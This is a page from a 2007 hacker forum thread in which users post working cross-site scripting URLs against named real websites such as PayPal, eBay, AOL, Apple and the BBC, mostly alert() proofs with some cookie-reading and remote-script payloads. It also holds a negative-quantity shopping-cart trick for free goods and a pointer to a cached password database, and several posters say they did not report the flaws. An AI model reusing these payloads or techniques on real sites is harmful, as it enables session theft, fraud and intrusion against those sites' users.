Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4849505152535455565758...LastNext
Current Page: 53 of 65
Re: So it begins
Posted by: Anonymous User
Date: September 10, 2007 10:20AM

@nav LOL check:
MZ82013 / Mozilla Sticker  qt: -90	$6.20	$-558.00
Free stuff my friends.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: September 11, 2007 09:40AM

A reader from my webzine gave me this:

http://jetli.com/index.php?l=%22%3E%3Cscript%3Ealert(%22uh%20OEZ%20JAVASCRIPT!%22)%3C/script%3E%3Cimg%20src=%22

Am too lazy to report it.

Options: ReplyQuote
Re: So it begins
Posted by: The-Wildcat
Date: September 11, 2007 10:14AM

http://www.blog.de/login.php?login=%22%3E%3Cscript%3Ealert('omg');%3C/script%3E
http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/domains/search.php?domain_name=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E***content,post
http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/company/company.php?p=contact&action=send&name=%22%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%27%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%27%22%20***content,post

Options: ReplyQuote
Re: So it begins
Posted by: xenoglaux
Date: September 11, 2007 02:11PM

Password database for OK Magazine, anyone?

(It's not available on their site anymore, but good old Google cache has it.)

http://64.233.183.104/search?q=cache:xMmXUkOOqIYJ:www.ok-magazine.com/users/index/+5f4dcc3b5aa765d61d8327deb882cf99&hl=en&ct=clnk&cd=259&gl=uk&client=firefox-a

Note that the MD5 hash of "password" is 5f4dcc3b5aa765d61d8327deb882cf99 - hmmm...

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: September 11, 2007 04:11PM

Ronald Wrote:
-------------------------------------------------------
> @nav LOL check:
>
> MZ82013 / Mozilla Sticker qt: -90 $6.20 $-558.00
>
> Free stuff my friends.


haha thats awesome, works for any item too. No check on negatives..

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: September 12, 2007 03:21AM

Need help again:

i need any expert here to find Xss flaw in my friend website. www.stonemaster.biz . Please full disclose here. Thx in advance

Options: ReplyQuote
Another ones
Posted by: iota
Date: September 13, 2007 08:56AM

http://ak.flashmo.com/sec/advisories/blueshoes.org

Options: ReplyQuote
Another ones
Posted by: iota
Date: September 13, 2007 09:09AM


Options: ReplyQuote
Re: So it begins
Posted by: Spikeman
Date: September 13, 2007 09:04PM

http://www.soul-reply.net/tamashi/country.php?id=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 14, 2007 09:14PM

https://domains.aol.com/personaldomain/app/openRegistration?domainName=%3Cscript%3Ealert(1)%3C/script%3E

- Ghozt

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: September 15, 2007 07:16PM


Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: September 21, 2007 04:32PM

http://www.yourdailymedia.com/exit.php?url="><script>alert(1)</script>

My example fires twice, "<a href="%urlGET%" class="book">" and another echo (title).

Options: ReplyQuote
Re: So it begins
Date: September 24, 2007 12:17PM

https://www.turnitin.com/password_reset1.asp?r=81.2867254709932&svr=4&lang=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&

Many professors require students to use this site to turn in assignments =o(

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: September 24, 2007 10:29PM

my first xss..

http://www.rpi2u.com/message.asp?message=<script>alert('xss')</script>

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: September 24, 2007 10:31PM

my first

http://www.rpi2u.com/message.asp?message=<script>alert('xss')</script>

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: September 25, 2007 08:02AM

I don't normally submit XSS but my mate got a new job and left the company I am working at so I had to test his new company out....2 mins later:-

http://www.lightmaker.com/search?search=%22%3E+%3Cscript%3Ealert%281%29%3C%2Fscript%3E

I reported it, they didn't reply

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: September 27, 2007 12:55PM

http://search.nba.com/promosearch.cgi?sp_i=1&sp_q=%DE&sp_a=sp10033e5e&sp_advanced=&sp_m=0&sp_f=ISO-8859-1&sp_t=%22%3E%3Cscript%3Ealert('ping --> pong')%3C/script%3E

Fires 7 times.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: October 02, 2007 12:15AM

http://visualbasic.about.com/gi/dynamic/offsite.htm?site=javascript:alert('xss');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: October 02, 2007 12:24PM

groups.ebay.com/tags.jspa?tag="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>

Options: ReplyQuote
Re: So it begins
Posted by: moe
Date: October 05, 2007 12:47PM

been watching this thread for a while; looks like some of the big networking guys are taking notice.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://investor.cisco.com/phoenix.zhtml?c=81192%26p=irol-eventReminderSuccess&control_EventReminderEmailText=%22%3E%3Cscript%3Ealert(12345)%3C/script%3E - no longer works; haven't explored other vectors yet.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: October 08, 2007 08:23PM

https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&sitedomain=my.aol.com&authLev=0&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Ffavorites.my.aol.com%252Fffclient%252Fwebroot%252F0.2.1%252Fsrc%252Fhtml%252FaddFeedDialog.html%253Furl%253Dhttp%25253A%252F%252Fwww.aisledash.com%252Frss.xml');alert('xss
http://beta.bordersstores.com/online/store/SearchResults?keyword=%22%2F%3E%3Cimg+src%3D%22ccx.gif%22+onerror%3D%22alert%28%27xss%27%29%3B%22+%2F%3E+&type=0&simple=1 << [how many millions have been spent building this piece of crap? Perhaps they should have left it to Amazon]

EDIT: If the devs from borders get to read this, please use you what little skills you have and spend some time going over this thread and you will see that flagging the term '<script>' in user supplied data does not make you secure, it only makes you stupid.

btw:
you can use beta as an excuse, if you never planned for it then it is really only a patch hey? therefore i can only wonder how many other "patches" you would need to secure your customers.

http://www.news.com.au/ = http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://searchresults.news.com.au/servlet/Search&searchoption=yes&masthead=adelaidenow&queryterm=%22%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0 (interestly they use Google custom search)

http://searchenginewatch.com/ = http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://searchenginewatch.com/showPage.html?page=sew_search_results&q=%22%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 6 time(s). Last edit at 10/09/2007 12:24AM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: TarraDog52
Date: October 10, 2007 01:03AM

http://pus.lcs.mit.edu/cgi-bin/scigen.cgi?author=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: October 12, 2007 10:53PM

https://officialsecureinternet.com/shop/product_info.php?products_id=49&osCsid=%22--%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%20%20%29%3B%3C/script%3E%5D%21%3E%3C%21%5B lol

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/12/2007 10:54PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: October 18, 2007 10:29AM

bbc lol:-
http://www.bbc.co.uk/cgi-bin/education/betsie/parser.pl/0005/www.google.com<iframe%20onload=alert%281%29

Ronald has also found this hole as well! I didn't steal his work honest! How easy is it to find these holes on major sites lol.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 10/19/2007 06:29AM by Gareth Heyes.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: October 23, 2007 01:03AM

http://www.sap.info/index.php4?ACTION=noframe&url=javascript:alert('xss');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: October 26, 2007 08:30PM

http://livechat.ebay.com/Chat/IVR/thankyou2.jsp?Chat_ID=&Chat_Queue=&CSR_Name=&Customer_Email=%22%3E%3Cscript%3Ealert(/Nemessis-WWW.RSTZONE.ORG/)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: zwerg
Date: October 30, 2007 04:28PM

Is this starting to get ridiculous? I posted a couple of months back, but it still only takes me about 5 minutes looking for XSS to find them. Here are a couple I have stumbled across just today.

NFL
http://www.nflshop.com/search/noResults.jsp?kw=%3Cscript%3Ealert('xss')%3C/script%3E

MLS (Major League Soccer)
http://web.mlsnet.com/search.do?query=%3Cscript%3Ealert('xss')%3C/script%3E&x=0&y=0&ccontext=mls&cid=mls

Apple (Developer site) - This does filter single quotes, but that is easy to work around.
http://developer.apple.com/cgi-bin/search.pl?&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&num=10&ie=utf8&oe=utf8&lr=lang_en&simp=1

Apple (Mailing lists) - Not filtered in the header, but easy to break out of using </title></head>
http://search.lists.apple.com/?q=test%22%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody+onload%3D%22alert%28%27xss%27%29%22%3E&cmd=Search%21&form=extended&m=all&ps=10&fmt=long&wm=wrd&wf=2221&sp=1&ul=

--kz



Edited 1 time(s). Last edit at 10/30/2007 04:39PM by zwerg.

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: October 31, 2007 09:14PM

crmgateway.paypal.com/payflow/cgi-bin/mail_pcancellation.pl?host=remote&processing=Yes&partner_login="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: November 01, 2007 04:37AM

VEry nice... it was worth a blog post~!

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: November 02, 2007 07:59PM

PayPal again

Alert version

https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&campaign_id=604&offer_id=775&landing_url=javascript:alert('Nemessis-CLICK-THE-LINK-(HERE)-IF-YOU-HAVE-FIREFOX')

Click on "here" (only firefox users)

-----------------------------------------------------

Redirect version:

https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&campaign_id=604&offer_id=775&landing_url=http://ha.ckers.org

Options: ReplyQuote
Pages: PreviousFirst...4849505152535455565758...LastNext
Current Page: 53 of 65


Sorry, only registered users may post in this forum.